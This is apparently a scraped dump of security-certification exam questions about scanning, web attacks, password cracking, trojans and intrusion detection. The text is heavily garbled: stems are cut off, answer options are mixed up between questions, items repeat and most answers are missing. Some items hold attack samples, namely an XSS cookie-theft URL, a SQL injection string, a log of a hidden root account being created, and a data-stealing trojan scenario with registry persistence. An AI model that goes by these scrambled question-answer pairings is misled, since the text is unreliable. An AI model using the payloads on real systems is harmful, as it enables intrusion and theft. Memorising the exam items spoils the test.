An understanding of the number of employees in the company QUESTION 445 John runs a Web server. How strong the corporate security policy is C. Exclamation Mark QUESTION 444 You are gathering competitive intelligence on a organization. The types of operating systems and applications being used D. You notice that they have jobs listed on a few internet job-hunting sites. FIN Scan C. Bob notices that the site is dynamic and must make use of a back end database. There are two jobs for network and system administrators. The IP range used by the target network B. Macro B. IDS and firewall on his network. XMAS Scan D. Enable the Firewall to filter encrypted HTTPS traffic 93 . System C. Double Quote D. A. Install a hardware SSL “accelerator” and terminate SSL at this layer C. A. Polymorphic D. Recently his Web server has been under constant hacking attacks. To which category does this virus belong? A. Windows Scan QUESTION 442 Melissa is a virus that targeted Microsoft Windows platforms. Single Quote B.B. A. Semi Column C. Enable the IDS to filler encrypted HTTPS traffic D. Boot Sector infector QUESTION 443 Bob has been hired to do a web application security test. Install a proxy server and terminate SSL at the proxy B.

A buffer under run exploit QUESTION 447 Microsoft Authenticode technology is used for A. Digitally signing ActiveX controls B. code 0) denote? 94 .QUESTION 446 You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server A. A buffer overflow exploit E. A SUID exploit B. John the Ripper Attacks QUESTION 449 What does ICMP (type 11. A chained exploit C. Replay Attacks B. Digitally signing SSL certificates C. A SQL injection exploit D. Digitally signing Javascript files D. Digitally signing Java Applets QUESTION 448 Which of the following is an attack in which a secret value like a hash is captured and then reused at a late A. Brute Force Attacks C. Cryptography Attacks D.

Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic QUESTION 451 What does ICMP (type 11. Unknown Type B. However. Unknown Type B. Destination Unreachable QUESTION 450 Derek has stumbled upon a wireless network and wants to assess its security. he does not find enough traffic for a good capture A. Time Exceeded C.168. A. Destination Unreachable QUESTION 452 Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system. Source Quench D. Brute Force Attacks C. Time Exceeded C. Cryptography Attacks D. Source Quench D.168.A. Replay Attacks B. code 0) denote? A.10 95 .10 A. John the Ripper Attacks QUESTION 453 Study the log below and identify the scan type Tcpdump –vv host 192.1. Derek can use KisMAC as it needs two USB devices to generate traffic D.1. Derek can use a session replay on the packets captured C. nmap R 192. Use any ARP requests found in the capture B.

ip. nmap V 192.0.168. ip. Air Snort uses a cache of packets C. Bob notices that the site is dynamic and must use of a back end database.10 C. Try to conduct Man-in-the-Middle (MiTM) QUESTION 456 Why do you need to capture five to ten million packets in order to crack WEP with AirSnort? A.168.addr = 192.0.168. Single Quote B.1. Look for “zero-day” exploits at various underground hacker website … C.1. Semi Column 96 . Try to hang a around the local pubs or restaurants near the bank… B. nmap S 192.168.flags. Air Snort implements the FMS attack … D.168. Launch DDOS attacks against Merclyn Barley bank router and firewall system D. Bob want to see if SQL injection A.10 QUESTION 454 Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.syn B.B.168.equals 192.0.addr == 192. All IVs are vulnerable to attack B.equals on QUESTION 455 You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley bank located in Log Angeles.168.10 D. A.1 and tcp. ip.1. A majority of weak IVs transmitted … QUESTION 457 Bob has been hired to do a web application security test.0.1 and tcp.0. nmap –sO –T 192.169.syn D.1? A.1 and syn. ip == 192.1 and syn = 1 C.

RIPE LACNIC D. 487 QUESTION 459 What us the problem with this ASP script (login. Nmap –sF – P0 – O <ip address> B. The ASP script is vulnerable to Cross Site Scripting attack QUESTION 460 Bill has started to notice some slowness on his network when trying to update his company’s website and while trying to access the website from the Internet A. ARIN C. 44 B. APNIC‘ QUESTION 461 You are concerned that someone running PortSentry could block your scans.asp)? sSQL = “SELECT * FROM users where Username A. The ASP script is vulnerable to XSS attack B. 419 D. The ASP script is vulnerable to Session Splice attack D.C. The ASP script is vulnerable to SQL Injection C. Exclamation Mark QUESTION 458 What port number is used by Kerberos protocol? A. LACNIC B. Double Quote D.PI – O <ip address> 97 . Nmap –sF – PT . A. 88 C.

txt file in the root of the …. Replay attacks B. It manipulates the flags within packets to force gateways into generating error messages D. Enable SSL on the restricted directory which … D. TCPdump C. Scanning attacks C. It uses a TCP timestamp packet that will elicit a time C. Nmap –sS – PT – PI . It manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit message QUESTION 467 You are senior security analyst for Hammerstreet in. IDSwakeup D. Place “HTTP:NO CRAWL” on the html … 98 .C. It uses a protocol that will be rejected by gateways on its way to the destion B. Place authentication on root directories that will prevent crawling from these spiders C. Nmap –sO – PT – O – C5 <ip address> D. located in Florida On Monday morning A. WinPcap QUESTION 468 WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. B. Session hijacking attacks D. A.O – T1<ip address> QUESTION 462 What hacking attack is challenge/response authentication used to prevent? A. Password cracking attacks QUESTION 463 How doest traceroute map to the route a packet travels from point A to Point B? A. Tcpslice B. Place robots.

The system is not running Linux or Solaris D. Samuel is a Straight ‘A’ student who really likes tinkering around with computer. DES B.QUESTION 469 What can you conclude from the following nmap result? Starting nmap V. Blowfish C. Warwalking C.10ALPHA9 A. Wardriving B. RC4 QUESTION 471 Samuel is a high school teenager who lives in Modesto California. Macof C. He has identified the operating system as Linux and been able to elicit response from ports 23. 25 and 53… 99 . AES (Rijndael) D. The system is a Windows Domain Controller QUESTION 470 Which of the following encryption is not based on block cipher? A. A. He has enabled numerous security features A.3. The system is not properly patched C. ARP spoofing D. Webdriving QUESTION 472 Paul has just finished setting up his wireless network. The system is not firewall enabled B. Warchalking D. MAC spoofing B. DNS spoofing QUESTION 473 Clive is conducting a pen-test and has just port scanned a system on the network.

You can start using your computer since the vendor such as DELL. Configure “Windows Update” to automatic F. Search?|:www.xsecurity. which comes pre-installed with Windows XP. Create a non-admin user with a complex password and logon to this account G.xsecurity. Install a personal firewall and lock down unused ports from connecting to your D. The services are protected by TCP wrappers B.com D. Nfscopy QUESTION 475 You are footprinting the www. An attacker has replaced the services with trojaned ones. This indicates that the telnet and SMTP server have crashed QUESTION 474 When Jason moves a file via NFS over the company’s network. A. Link:www.A. Level1:www.xsecurity. you want to grab a copy of it by sniffing. Macof B.xsecurity. Filesnarf D. A. There is a honeypot running on the scanned machine C.com B.com C. McAfee antivirus software an a host of other applications. New installation of windows should be patched by installing the latest service packs and hotfixes B. Install the latest signatures for Antivirus software E. HP QUESTION 477 ________is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting 100 . D.com domain using Google search engine. Webspy C.xsecurity. Enable “guest” account C. Pagerank:www.com QUESTION 476 You just purchased the latest DELL computer. A.

He shuts down all unnecessary ports and services. Use Monkey shell C. he has installed a firewall (Cisco PIX) A. Cross Site Scripting QUESTION 480 What port number is used by LDAP protocol? A. Yes. Use closedVPN B. Use reverse shell using FTP protocol D. Merge Streams C. A hybrid attack B. No. 445 D. you attempt to insert the following test script into the search area on the company A. Additionally. Alternate Data Streams QUESTION 478 John has a proxy server on his network which caches and filters web access. a security analyst. 464 QUESTION 481 June. June can use an antivirus program since it compares the parity bit 101 . 389 C. Use HTTPTunnel or Stunnel on port 80 and 443 QUESTION 479 While testing web applications. 110 B.A. June can’t use an antivirus program since it compares the size B. NetBIOS vulnerability D. Password attacks D. understands that a polymorphic virus has the ability to mutate and can change its known viral signature A. Steganography B. A buffer overflow C.

C. Yes. June can use an antivirus program since it compares the signatures D. No. Jun can’t use an antivirus program since it compares the signatures QUESTION 482 You have been using the msadc.pl attack script execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious

A. A SUID exploit B. A chained exploit C. A SQL injection exploit D. A buffer overflow exploit E. A buffer under run exploit QUESTION 483 Jim was having no luck performing a penetration test on his company’s network. He was running the test from home and had downloaded every scanner. A. Security scanners cannot perform vulnerability linkage B. Security scanners are not designed to do testing through a firewall C. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities D. All of the above QUESTION 484 Steven, a security analyst for XYZ asscociates

102

A. Smurf attack B. ARP spoofing C. Ping of Death D. SYN flood QUESTION 485 Consider the following code: URL:http://www.xsecurity.com/search.pl?text=<script>alert(document.cookie)</script> A. Create an IP access list and restrict connections based on port number B. Replace “<”and”>” characters with ?il;?and ?gt C. Disable Javascript in IE and Firefox browsers D. Connect to the server using HTTPS protocol instead of http QUESTION 486 The following is an entry captured by network IDS. You are assigned the task of analyzing this entry.

103

A. The buffer overflow attack has been neutralized by the IDS B. The attacker is creating a directory on the compromised machine C. The attacker is attempting a buffer overflow attack and has succeeded D. The attacker is attempting an exploit that launches a command-line shell
QUESTION 487 A program that defends against a port scanner will attempt to: A. Sends back bogus data to the port scanner B. Log a violation and recommend use of security-auditing tools C. Limit access by the scanning system to publicly available ports only D. Update a firewall rule in real time to prevent the port scan from being completed QUESTIYON 488 An attacker has been successfully modifying the purchase price of items purchased at a web site. A. By using SQL injection B. By using cross site scripting C. By changing hidden form values in a local copy of the web page D. There is no way the attacker could do this without directly compromising either the web server or the database QUESTION 489

104

Prime detection C. SMBCrack C. RainbowCrack B. Brute-forcing QUESTION 491 Microsoft Authenticode technology is used for: A. Digitally signing java Applets QUESTION 492 Clive has been monitoring his IDS and sees that there are a huge of ICMP Echo ….Johnny is a member of the hacking group Orpheus1 A. Digitally signing ActiveX controls B. A. Factorization B. Digitally signing javascript file D. Hashing D. Someone spoofed Clive’s IP address while doing a smurf attack D. Someone spoofed Clive’s IP address while doing a fraggle attack QUESTION 493 What does this symbol mean? 105 . Someone spoofed Clive’s IP address while doing a land attack B. PSCrack QUESTION 490 One of the most common and the best way of cracking RSA encryption A. Someone spoofed Clive’s IP address while doing a DoS attack C. Digitally signing SSL certificates C. SmurfCrack D.

You must use ping 10. IP Access Blockade 106 . Ping packets cannot bypass firewalls B. Website Filtering C. Sequence numbers monitoring QUESTION 496 The terrorist organizations are increasingly blocking all traffic from North America or from internet protocol addresses that point A. WPA encrypted access point C. WEP encrypted access point D. Open access point B.2. File permissions D. hping2 uses stealth TCP packets to connect QUESTION 495 Attackers can potentially intercept and modify unsigned SMB packets. Website Cloaking B. Closed access point QUESTION 494 You ping a target IP to check if the host is up.A.4 switch C. A. SMB signing C. Timestamps B. hping2 uses TCP instead of ICMP by default D.3. modify the traffic A.

Tunneling D.D.org and other leading security organizations have clearly A. It is getting harder to hack and more challenging for non technical people QUESTION 499 Why would an attacker want to perform a scan on port 137? A. Firewalking QUESTION 498 Statistics from cert. Increase in processing power B. To check for file and print sharing on Windowns Systems D. Honeypot B. To discover information about a target host using NBTSTAT QUESTION 500 What type of attack is shown in the above diagram? 107 . The ease of getting hacker tools on the internet C. New TCP\IP stack features are constantly being added D. To disrupt the NetBIOS SMB service on the target host C. To discover proxy server on a network B. Mirroring Website QUESTION 497 Shauna is the Senior Security Analyst for the Department of Defense A. Obfuscation C.

Take over the session B. SSL Spoofing Attack B. Identity Stealing Attack C. Man-in-the-Middle (MiTM) Attack. Session Hijacking Attack D. Reverse sequence prediction C. Guess the sequence numbers QUESTION 502 Study the following log extract and identify the attack 108 .A. QUESTION 501 Bob is going to perform an active session hijack against brownies inc. He has found a target A. Take one of the parties offline D.

Multiple Domain Traversal Attack D. Hexcode Attack B. Unicode Directory Traversal Attack QUESTION 503 John is using a special too on his Linux that has a database containing signatures A. Denial of service attack QUESTION 505 109 . Nmap C. Information gathering C.A. Cross Site Scripting C. Unauthorized access D. Make B. nessus QUESTION 504 Which type of attack is port scanning? A. Web server attack B. Hping2 D.

D. He looks up the IDS log files and sees no Intrusion attempts but the web server constantly locks up and needs rebooting due to various brute force and buffer overflow attacks but still the IDS alerts no intrusion whatsoever. SysEvent. as it can be used for malevolent attacks as well. Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises. this knowledge has a risk associated with it.) B.) C. Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life. Recently his Web Server has been under constant hacking attacks. However. WinEvent. you proceed to clear the log files to hide your trace. Bob is willing to share his knowledge with those who are willing to learn.Evt B. Enable the firewall to filter encrypted HTTPS traffic John runs a Web server QUESTION 506 Which of the following snort rules look for FTP root login attempts? A. Which event log located at C:\Windows\system32\config contains the trace of your brute force attempts? A. John become suspicious and views he firewall logs and he notices huge SSL connections constantly hitting web server. IDS and firewall on his network. alert ftp -> ftp (content:"user password root". You logon to the system using the brute forced password and plant backdoors and rootkits. AppEvent.Evt C.John runs a Web Server. Educate everyone with books. SecEvent. Enable the IDS to filter encrypted HTTPS traffic D. alert tcp -> any port 21 (msg:"user root". The username/password is "Admin" and "Bettlemani@". How would Jon protect his network form these types of attacks? A. Install a proxy server and terminate SSL at the proxy B. C. After downloading various sensitive documents from the compromised machine.Evt D. Install a hardware SSL "accelerator" and terminate SSL at this layer C. Hire more computer security monitoring personnel to monitor computer systems and networks. vulnerabilities and safeguards.) D. B. alert tcp any any -> any any 21 (content:"user root". alert tcp -> any port 21 (message:"user root".) QUESTION 507 Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites. what would be the most affective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hats or computer security professionals? (Choose the test answer) A. QUESTION 508 You have successfully brute forced basic authentication configured on a Web Server using Brutus hacking tool.Evt 110 . articles and training on risk analysis. Hackers have been using the encrypted HTTPS protocol to send exploits to the web server and that was the reason the IDS did not detect the intrusions. In this context.. and many have expressed their interest in learning from him.

Spoof attack B. C. QUESTION 514 111 . They are not using a stateful inspection firewall. Unicode Traversal Attack QUESTION 511 Annie has just succeeded in strealing a secure cookie via a XSS attack. It works because encryption is performed at the network D. It works because encryption is performed at the application QUESTION 512 Matthew re-injects a captured wireless packet back onto the network. SQL injection Attack C. What can you infer from this observation? A. B. They are using UNIX based web servers. Rebound attack QUESTION 513 While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. Cross Site Scripting B. What attack will his program expose the web application to? A. The scenario is invalid as a secure cookie C. They are not using an intrusion detection system. D. He chooses to use printf(str) where he should have ideally used printf(?s? str). Any cookie can be replayed irrespective B. A. A. He likes to keep his code neat and simple. They are using Windows based web servers.QUESTION 509 A company is legally liable for the content of email that is sent from its system A B True False QUESTION 510 Kevin has been asked to write a short program to gather user input for a web application. Format String Attack D. Injection attack D. Replay attack C.

Bob has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network. What is the destination MAC address of a broadcast frame? A. Someone who is using his/her skills for defensive purposes. IP Fragmentation or Session Splicing B. Firewalls can't inspect traffic coming through port 443 B. 0xDDDDDDDDDDDD QUESTION 519 Bob waits near a secured door. Firewalls can't inspect traffic coming through port 80 D. QUESTION 517 Sabotage. they can only block or allow certain ports QUESTION 516 What does the term “Ethical Hacsheets” mean? A. D. Social engineering B. Advertising and Covering are the three stages of _____ A. He injects broadcast frames onto the wire to conduct MiTM attack. holding a box. B. Firewalls can't inspect traffic at all. Firewalls can only inspect outbound traffic C. 0xBBBBBBBBBBBB D. C. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Reverse Software Engineering D. IP Splicing or Packet Reassembly QUESTION 515 Bob has set up three web servers on Windows Server 2003 IIS 6. Someone who is using his/her skills for offensive purposes. Reverse Social Engineering C. IDS Spoofing or Session Assembly D. IP Routing or Packet Dropping C. Bob is still concerned about the security of this server because of the potential for financial loss. 0xFFFFFFFFFFFF B. He waits until an employee walks up 112 .This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and the IDS will not spot the true A. Bob has followed all the recommendations for securing the operating system and IIS.0. Rapid Development Engineering QUESTION 518 John the hacker is sniffing the network to inject ARP packets. Someone who is hacsheets for ethical reasons. Why will this not be possible? A. 0xAAAAAAAAAAAA C. Someone who is using his/her skills for ethical reasons.

Parameter Manipulation QUESTION 522 Clive has been hired to perform a Black-Box test by one of his clients. he alters a cookie as shown below. setup a mock video camera next to the special card reader adjacent to the secured door D. to educate all of the employees of the company on best security practices on a recurring basis QUESTION 520 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? A. What attack is being depicted here? A. An intruder could intercept and delete data or alerts and the intrusion can go undetected QUESTION 521 Ivan is auditing a corporate website. Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. The monitor will know if counterfeit messages are being generated because they will not be encrypted C. Cross Site Scripting D. and patches installed. issue special cards to access secured doors at the company and provide a one-time only brief description of use of the special card B. CEC52EB9C8E3455DC2265B23734E0DAC 113 . 0182BD0BD4444BF836077A718CCDF409 F. What is the best way to undermine the social engineering activity of tailgating? A. Just as the employee opens the door. to post a sign that states "no tailgating" next to the special card reader adjacent to the secured door C. 44EFCE164AB921CQAAD3B435B51404EE B. ADMIN=no. B. Only the IP address range. E52CAC67419A9A224A3B108F3FA6CB6D E. BA810DBA98995F1817306D272A9441BB D. Session Hijacking C. Using Winhex. OS. ADMIN=yes. IP Range. y=1 . Nothing but corporate name. How much information will Clive obtain from the client before commencing his test? A.to the secured door and uses the special card in order to access the restricted area of the target company. B757BF5C0D87772FAAD3B435B51404EE C. Before Alteration: Cookie: lang=en-us. Alerts are sent to the monitor when a potential intrusion is detected D. y=1 . After Alteration: Cookie: lang=en-us. C. All that is available from the client site. time=12:30GMT . QUESTION 523 Which of the following LM hashes represent a password of less than 8 characters? (Select 2) A. Encryption of agent communications will conceal the presence of the agents B. Cookie Stealing B. time=10:30GMT . D.

org/nmap/) at 2003-06-18 19:14 IDT Interesting ports on 10. As a security professional.1: (The 1628 ports scanned but not shown below are in state: closed) PortStateService 21/tcp filtered ftp 22/tcp filtered ssh 25/tcp open smtp 80/tcp open http 135/tcp open loc-srv 139/tcp open netbios-ssn 389/tcp open LDAP 443/tcp open https 465/tcp open smtps 1029/tcp open ms-lsa 1433/tcp open ms-sql-s 2301/tcp open compaqdiag 5555/tcp open freeciv 5800/tcp open vnc-http 5900/tcp open vnc 6000/tcp filtered X11 Remote operating system guess: Windows XP. Windows 2000. what would you infer from this scan? A. This scan is eating up most of the network bandwidth and Neil is concerned. Windows 98 SE C. What operating system is the target host running based on the open ports shown above? A. It is one of the weak channels used by WEP that makes it insecure D. Windows 2000. A Server Program using a port that is not well known QUESTION 526 Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. The attacker is trying to detect machines on the network which have SSL enabled 114 . It is a network fault and the originating machine is in a network loop B.0. Making use of a Protocol in a way it was not intended to be used B.0. It is a worm that is malfunctioning or hardcoded to scan on port 500 C.insecure.28 ( www.334 seconds Using its fingerprinting tests nmap is unable to distinguish between different groups of Microsoft based operating systems . It is the multiplexing taking place on communication link C. NT4 or 95/98/98SE.1 IP address (1 host up) scanned in 3.0. NT4 or 95/98/98SE Nmap run completed -.1 Starting nmap 3.0. Windows 2000 Server QUESTION 525 Which definition below best describes a covert channel? A.QUESTION 524 You have initiated an active operating system fingerprinting attempt with nmap against a target system: [root@ceh NG]# /usr/local/bin/nmap -sT -O 10. Windows XP B. Windows NT4 Server D.Windows XP.

Use a Internet browser other than the one that Angela is currently using QUESTION 529 Scanning for services is an easy job for Bob as there are so many tools available from the Internet.com/tools/) However. For example.com/creditcard.com) 2. VLAD the Scanner. Change the settings on the firewall to allow all incoming traffic on port 80 C.com/sara) 3. by Razor (http://razor. C.axent. Replace the GET with POST method when sending data B. SARA. Here are the scanners that he uses: 1. In order for him to check the vulnerability of Examsheets. Use HTTOS SSLV3 to send the data instead of plain HTTPS D. This means that anyone with access to a server log will be able to obtain this information. This is because any GET command will appear in the URL and will be logged by any servers. Never include sensitive information in a script C. Using the manual method of telnet to each of the open ports of Examsheets.bindview. he went through a few scanners that are currently available. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for Examsheets. Since Angela's computer is behind a corporate firewall. When Angela clicks on the link to access the login page. she gets an error message stating that the page can't be reached. Encrypt the data before you send using GET method QUESTION 528 Angela is trying to access an education website that requires a username and password to login.D. She contacts the website's support team and they report that no one else is having any issues with the site. The URL may appear like this: https://www. D.asp?cardnumber=454543433532234 The GET method appends the credit card number to the URL. How would you protect from this type of attack? A. What would be the best method to accurately identify the services running on a victim host? A. let's say that you've entered your credit card information into a form that uses the GET method. her computer can't ping the education website back. Axent’s NetRecon (http://www. Using Cheops-ng to identify the devices of Examsheets. 115 . it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education's server. Change the IP on Angela's Computer to an address outside the firewall B. Change the settings on the firewall all outbound traffic on port 80 D. After handing the issue over to her company's IT department. B.xsecurity-bank. Using the default port and OS to make a best guess of what services are running on each port for Examsheets. there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. What ca Angela's IT department do to get access to the education website? A. by Advanced Research Organization (http://www-arc. The attacker is trying to determine the type of VPN implementation and checking for IPSec QUESTION 527 The GET method should never be used when sensitive data such as credit is being sent to a CGI program.

(Overflows the buffer).0 seems to be a subnet 116 . Because the counter starts with 0. Connect using ISP’s remote-dial in number since the company’s router has a leased line connection established D.0. Search the Internet for leakage of target company’s telephone number to dial-in the router B. The stack holds exact 200 characters so there is no need to stop before 200. How can you protect/fix the problem of your application as shown above? A. Bob decided to insert 400 characters into the 200-character buffer. Add a separate statement to signify that if we have written 200 characters to the buffer. QUESTION 532 Starting nmap 3.org/nmap/) at 2006-09-25 00:01 EST host 192.insecure.169. the stack should stop because it can't hold any more data Answer: A. Because there were no proper boundary checks being conducted. Run a war-dialing tool range of phone numbers and look for CONNECT response C.75 (http://www. we would stop when the counter is more than 200 C. the stack should stop because it can't hold any more data D. Brute force the company’s PABX system to retrieve the range of telephone number to dial in QUESTION 531 Buffer X in an Accounting application module for Brownies Inc. Because the counter starts with 0. The programmer makes an assumption that 200 characters are more than enough. can contain 200 characters. we would stop when the counter is less than 200 B. Add a separate statement to signify that if we have written less than 200 characters to the buffer. Below is the code snippet.C Explanation: I=199 would be the character number 200.QUESTION 530 Wardialing is one of the oldest methods of gaining unauthorized access to the targeted system A.

16 million years QUESTION 534 While reviewing the results of a scan run against a target network you come across the following: What was used to obtain this output? A.168. 200 years D. How long will it take to crack the password by an attacker? A. An SNMP Walk B. Nmap protocol/port scan QUESTION 535 Study the log given below and answer the following questions 117 .168.0. 23 days C.1/24 QUESTION 533 You have chosen a 22 character word from the dictionary as your password.0.168. Root nmap –sA 192.A. Launch nmap –PP 192.1/24 C. Run nmap –TX 192. Hping2 diagnosis C.168.0.1/24 B. 5 minutes B. A Bo2K System query D. Sudo nmap –sP 192.0.1/24 D.

you send SYN A.226. Idle scanning QUESTION 538 Which of the following best describes Vulnerability? A. Using hping2. Firewalking B. A buffer overflow attempt C. ssp/ProPolice (as used by OpenBSD). An agent that could take advantage of a weakness 118 . Footprinting C. Non-executing stack QUESTION 537 You are attemping to map out the firewall policy for organization. Hex editing C. Data being retrieved from 63. An IDS evasion technique D. A DNS zone transfer B. Enumeration D. Format checking D. You discover your target system is one hop beyond the firewall. Canary B. and Microsoft's /GS option use _____ defense against buffer overflow attacks.A.13 QUESTION 536 StackGuard (as used by Immunix).81. An action or event that might prejudice security C. A. The loss potential of a threat B.

Reconfigure the firewall B. Automatically deleting Trojan horse programs B. A security breach has occurred as a direct result of this activity. True B. A. How would you resolve this situation? A. False QUESTION 540 Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. Install a network-based IDS D. True B. During one of your periodic checks to see how well policy is being observed by the employees. The employee explains that he used the modem because he had to download software for a department project. The web application picked up a record at random B. you discover an employee has attached a modem to his telephone line and workstation. Inc. False QUESTION 541 You are the Security Administrator of Xtrinity. A weakness or error that can lead to compromise QUESTION 539 A digital signature is simply a message that is encrypted with the public key instead of the private key. The web application emailed the administrator about the error QUESTION 544 Bob is conduction a password assessment for one of his clients. The server error has caused the application malfunction D. Rejecting packets generated by Trojan horse programs C. Helping you catch unexpected changes to a system utility file that might indicate it QUESTION 543 Bryan notices the error on the web page and asks Liza to enter liza ‘or ‘1’=’1’ in the email field A. 119 . The web application returned the first record it found C. A. Enforce the corporate security policy QUESTION 542 A file integrity program such as Tripwire protects against Trojan horse attacks by: A. He has used this modem to dial in to his workstation. Using programming hooks to inform the kernel of Trojan horse behavior D.D. Conduct a needs analysis C. You write security policies and conduct assesments to protect the company's network. thereby bypassing your firewall.

c to create an executable file chess. scans the entire system (c:\) for data with the following text "Credit Card" and "password". dns C. mkdir -p /etc/X11/applnk/Internet/. mkdir -p /etc/X11/applnk/Internet/. Software only. how many user IDs can you identify that the attacker has tampered with? 1. Kerberos is preventing it.etcpasswd 4. touch -acmr /etc /etc/X11/applnk/Internet/. Windows logons cannot be sniffed. HKEY_LOCAL_MACHINE\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices B. You want to make this Trojan persistent so that it survives computer reboots. he is unable to capture any logons though he knows that other users are logging in.etcpasswd 3. The user is plugged into a hub with 23 other systems. acmr. and Sniffing B. touch -acmr /etc/X11/applnk/Internet/.etc 5. What do you think is the most likely reason behind this? A.etc 2. nobody. Hardware and Software Keyloggers C.etcpasswd /etc/passwd 9. This Trojan when executed on the victim machine. D. touch -acmr /etc/passwd /etc/X11/applnk/Internet/. HKEY_LOCAL_SYSTEM\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices D. touch -acmr /etc/X11/applnk/Internet/. HKEY_LOCAL_USER\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices C. QUESTION 547 After studying the following log entries. HKEY_CURRENT_USER\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices QUESTION 546 A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carry user logons.A. Password are always best obtained using Hardware key loggers QUESTION 545 You are writing an antivirus bypassing Trojan using C++ code wrapped into chess. However. B. passwd nobody -d 6. C. It then zips all the scanned files and sends an email to a predefined hotmail address. Which registry entry will you add a key to make it persistent? A. passwd dns -d 8. dns 120 . Software.etc /etc A. Hardware. they are the most effective D. IUSR_ B. There is a NIDS present on that segment. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7.exe. L0phtcrack only sniffs logons to web servers.

How was security compromised and how did the firewall respond? A. Most communication between the company. IUSR_ QUESTION 548 Dave has been assigned to test the network security of Acme Corp. The attack was deception and security was not directly compromised D. Richard wants to utilize email encryption agency-wide. Visitors were allowed to click on a sand clock to mark the progress of the test. The attack was social engineering and the firewall did not detect it C. The only problem for Richard is that his department only has couple of servers and they are utilized to their full capacity. Security was not compromised as the webpage was hosted internally QUESTION 549 QUESTION 550 Co’ 2 cau lap lai 550 Dave has been assigned to test the network security of Acme Corp. The attack was deception and security was not directly compromised D. Richard wants to get ahead of the game and become compliant before any sort of auditing occurs. Visitors were allowed to click on a sand clock to mark the progress of the test. Security was not compromised as the webpage was hosted internally 551 Richard is a network Administrator working at a student loan company in lowa. He also added some statistics on the webpage. The test was announced to the employees. Because of privacy laws that are in the process of being implemented. The attack did not fall through as the firewall blocked the traffic B. The attack did not fall through as the firewall blocked the traffic B. Dave successfully embeds a keylogger. This company processes over 20.000 students loan a year from colleges all over the state. How was security compromised and how did the firewall respond? A. Much of the email communication used at his company contains sensitive information such as social security numbers. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. The firewall protects the network well and allows strict Internet access. The test was announced to the employees. schools and lenders is carried out through email. He also added some statistics on the webpage. Since a server-based PKI is not an option for him. The attack was social engineering and the firewall did not detect it C. he is looking 121 . Dave successfully embeds a keylogger. For this reason. The firewall protects the network well and allows strict Internet access. He created a webpage to discuss the progress of the tests with employees who were interested in following the test.D. nobody.

even when he has not been on the Internet. Mozila C. many of the programs and applications his company uses are web-based. Travis's Computer is infected with Self-Replication Worm that fills the hard disk space D. Tiger 554 Daryl is a network administrator working for Dayton Technologies. code. Travi's Computer is infected with Stealth Torjan Virus C. anti-spyware software and always keeps the computer up-to-date with Microsoft patches. and more. but they quickly disappear. PGP B. Since has drive is a 200 GB hard drive. folder by folder to see if there is anything he can find.for a low/no cost solution to encrypt email. Bob always make use of a basic Web Browser to perform such examing. After about two months of working on his new computer. Travis computer is even more noticeable slow. OTP 552 Travis works primarily from home as a medical transcriptions. 3DES D. He just bought a brand new Dual Core Pentium Computer with over 3 GB of RAM. Since Daryl's background is in web application development. According to his calculations. Travis thinks this is very odd. Lynx D. He has seen these windows show up. he notices that his computer only has about 10 GB of free space available. What should Richard use? A. Travis's Computer is infected with stealth kernel level rootkit B. Travis scans his through Windows Explorer and check out the file system. Travis frequently has to get on the Internet to do research on what he is working on. Which of the following web browser can adequately fill this purpose? A. He spends over four hours pouring over the files and folders and can't find anything but before he gives up. he should have around 150 GB of free space. He plans to exam a site that is known to have malicious applets. Travis uses antivirus software. Logic Bomb's triggered at random times creating hidden data consuming junk files 553 Bob is a very security conscious computer user. Daryl sets up a simple forms-based logon screen for all the applications he creates so they are secure. RSA C. which is why he bought the new computer. Every once in awhile. Internet Explorer B. He uses voice recognition software is processor intensive. What is mostly likely the cause of Travi's problems? A. 122 . Travis is really worried about his computer because he spent a lot of money on it and he depends on it to work. Travis also notices a window or two pop-up on his screen. After another month of working on the computer. he notices that it is not running nearly as fast as it used to. Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer.

